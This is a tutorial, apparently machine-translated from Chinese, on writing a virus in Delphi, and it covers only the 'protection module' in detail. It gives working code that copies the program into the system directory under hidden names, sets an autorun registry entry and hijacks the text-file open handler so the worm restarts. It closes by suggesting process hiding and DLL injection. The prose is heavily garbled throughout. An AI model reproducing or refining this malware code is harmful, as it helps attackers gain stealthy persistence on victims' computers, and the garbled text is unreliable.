Preface:
We may think of the virus, the first reaction is, may be prepared to use asm, or vbsript, and high-level languages such as delphi can not prepare the same as if, in fact, the fact is not like that, as long as we spend some time, can still write Short-virus program and efficient, not to lose those compiled by written procedure Oh.
A short-virus program first of all, our goal is compressed at 30k below. Delphi used friends all know that it uses to join in the forms, classes ..... and so on will make the goal very large files, so we are in the process, we do not have to be as much as possible of these libraries. We only use the windows, winsock, shellapi, sysutils (which contains a number of the commonly used functions, such as the operation of the document, the string of operations, if its own procedures in place, the goal will be more small-documentation)
First of all, we know that a virus program is generally the following three sub-modules:
① protection module;
② infection module;
③ attack module.
We are following on from the start of the three modules, namely the realization of their code.
A) the protection module.
In general, we are to copy itself to some of the system directory, for example,% systemroot%. In that case, we have to get those specific directory path inside the sdk has provided us with such a function GetSystemDirectory:
UINT GetSystemDirectory (
LPTSTR lpBuffer, / / store to return the string buffer
UINT uSize / / buffer to the top of the length of the
);
GetWindowsDirectory related functions can also be the path of the% windows%
The system has been directory, the second step is to copy the document. sdk provides us with a function copyfile:
BOOL CopyFile (
LPCTSTR lpExistingFileName, / / source file path
LPCTSTR lpNewFileName, / / destination file path
BOOL bFailIfExists / / This is a sign, if the target file already exists, is it mandatory coverage
);
Copy paper has been completed, we come to this document and is set to hide, then it is generally not see the document unless all documents select to view, as well as the display of a protected file. Similarly, the introduction of a function SetFileAttributes:
BOOL SetFileAttributes (
LPCTSTR lpFileName, / / need to set up the document file name
DWORD dwFileAttributes / / set the value.
);
We are here to set up the system and to hide, then for the second parameter FILE_ATTRIBUTE_HIDDEN + FILE_ATTRIBUTE_SYSTEM
The following is the most important, so that the boot file to run automatically, we usually write registry, first of all with RegOpenKey function to open a key.
LONG RegOpenKey (
HKEY hKey, / / primary key, such as HKEY_LOCAL_MACHINE
LPCTSTR lpSubKey, / / the following subkey
PHKEY phkResult / / function to return to the store to open the handle of the key
);
Has been HKEY, regsetvalueex you can use to write key to a specific value.
LONG RegSetvalueEx (
HKEY hKey, / / this is that we have just received the handle
LPCTSTR lpvalueName, / / 000 of Address Key
DWORD Reserved, / / general set to 0
DWORD dwType, / / we are the keys to write the type of string for the REG_SZ
CONST BYTE * lpData, / / address of the key
DWORD cbData / / write the key length
);
Now, I integrated the above description to give a brief example:
procedure SelfCopy;
var
Path, value: array [0 .. 255] of char;
Hk: HKEY;
S: string;
begin
GetSystemDirectory (Path, 256);
/ / Get the path of the system
s: = strpas (Path);
/ / Convert string
CopyFile (pchar (paramstr (0)), pchar (S + '/ ruin.exe'), false);
CopyFile (pchar (paramstr (0)), pchar (S + '/ virus_ruin.exe'), false);
/ / Copy itself to the directory system for ruin.exe, virus_ruin.exe
SetFileAttributes (pchar (S + '/ ruin.exe'), FILE_ATTRIBUTE_HIDDEN + FILE_ATTRIBUTE_SYSTEM);
SetFileAttributes (pchar (S + '/ virus_ruin.exe'), FILE_ATTRIBUTE_HIDDEN + FILE_ATTRIBUTE_SYSTEM);
/ / Set up just for the two documents and hidden
RegOpenKey (HKEY_CLASSES_ROOT, 'txtfile / shell / open / command', Hk);
value: = 'virus_ruin.exe% 1';
RegSetvalueEx (Hk,'', 0, REG_SZ, @ value, 17);
/ / Virus_ruin.exe and the associated text file
RegOpenKey (HKEY_LOCAL_MACHINE, 'Software / Microsoft / Windows / CurrentVersion / Run', Hk);
value: = 'ruin.exe';
RegSetvalueEx (Hk, 'ruin', 0, REG_SZ, @ value, 8);
/ / Set up to run automatically boot ruin.exe
end;
We look at the top of the process, completed a self-reproduction, and start to run automatically, and the associated text file, so that, if run under the key is deleted, so he opened the text file, the worm file has been activated.
But like this, you need inside your main program to judge if the transmission parameters equal to 1, then open the text and self-protection.
Such as:
begin
if paramcount = 1 then
shellexecute (0, 'open', 'notepad.exe', pchar (paramstr (1)), nil, sw_normal);
/ / Other code
Here, I just give a simple example to describe a rough idea of where a lot of room for improvement, such as hidden process, you can determine if you are 98 can registerserverapplication If you are using the 2000, you can do To start the service, or insert dll, or cover letter with the method of loading a boot dll, or win.ini. |
